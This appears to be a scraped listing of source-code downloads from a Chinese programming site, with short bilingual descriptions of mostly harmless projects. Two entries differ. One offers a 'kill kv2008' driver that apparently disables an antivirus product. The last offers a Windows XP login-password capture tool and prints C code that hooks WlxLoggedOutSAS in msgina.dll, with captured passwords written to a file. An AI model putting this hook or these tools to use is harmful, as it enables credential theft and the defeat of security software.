-
我们学校信息管理西的论文,大家欣赏一下,好好交流,一起提高...
我们学校信息管理西的论文,大家欣赏一下,好好交流,一起提高-It is a paper of our college of information management.Let us enjoy it and study together.We will improve ourselves too!
- 2022-06-01 08:14:50下载
- 积分:1
-
VC++编程,简单的加密文件,然后读取程序,并和用户的输入相比较...
VC++编程,简单的加密文件,然后读取程序,并和用户的输入相比较-VC++ Programming, a simple encrypted file, and then read the procedures and and user input compared to
- 2022-07-16 18:46:26下载
- 积分:1
-
气象保障常用软件包:本书分为10章,包括客观分析、诊断分析、多元统计分析、主分量分析、自适应统计天气预报方法、时间序列分析、谱分析、人工神经网络天气预报方法、灰...
气象保障常用软件包:本书分为10章,包括客观分析、诊断分析、多元统计分析、主分量分析、自适应统计天气预报方法、时间序列分析、谱分析、人工神经网络天气预报方法、灰色系统及气象绘图软件等内容。 Fortran代码写在word文档中。-Commonly used meteorological package: This book is divided into 10 chapters, including an objective analysis, diagnostic analysis, multivariate statistical analysis, principal component analysis, adaptive statistical weather forecasting methods, time series analysis, spectral analysis, artificial neural network forecast method, the gray systems and meteorological elements, such as mapping software. Fortran code written on the word document.
- 2022-10-24 17:20:03下载
- 积分:1
-
实现树的点击
当点击节点时展开子节点树的功能
实现树的点击
当点击节点时展开子节点树的功能-tree description
- 2022-05-07 18:30:26下载
- 积分:1
-
Andrew Koenin成名之作..
本书所揭示的知识,至少能够帮助你减少C代码和初级C++代码中90%的Bug
聆听大师教诲 掌握编程精髓......
Andrew Koenin成名之作..
本书所揭示的知识,至少能够帮助你减少C代码和初级C++代码中90%的Bug
聆听大师教诲 掌握编程精髓... -Andrew Koenin famous for .. The book of revealed knowledge, at least be able to help you reduce the C code and primary C++ Code 90 of the Bug programming to listen to master the essence of the teachings of master ...
- 2022-01-25 20:54:33下载
- 积分:1
-
widestudio 快速参考手册,此gui的api的快速参考,有助于界面编程...
widestudio 快速参考手册,此gui的api的快速参考,有助于界面编程-widestudio Quick Reference Guide, the gui of the api a quick reference to help interface programming
- 2022-07-16 13:35:32下载
- 积分:1
-
WIN32架构的立方体绘制,是我编写的关于WIN32架构的立方体绘制的程序,适合初学者使用及资深者使用...
WIN32架构的立方体绘制,是我编写的关于WIN32架构的立方体绘制的程序,适合初学者使用及资深者使用-WIN32 architecture cube drawing, written by me on the WIN32 architecture cube drawing program, suitable for beginners and experienced to use
- 2022-07-14 04:30:25下载
- 积分:1
-
语音录制和播放系统,带有G729A和ILBC编解码
语音录制和播放系统,带有G729A和ILBC编解码-Voice record and playback system, with G729A and ILBC codec
- 2022-02-07 04:48:39下载
- 积分:1
-
kill kv2008驱动vc 6.0工程,编译通过。
kill kv2008驱动vc 6.0工程,编译通过。-kill kv2008驱动工程,
- 2022-02-14 09:46:01下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1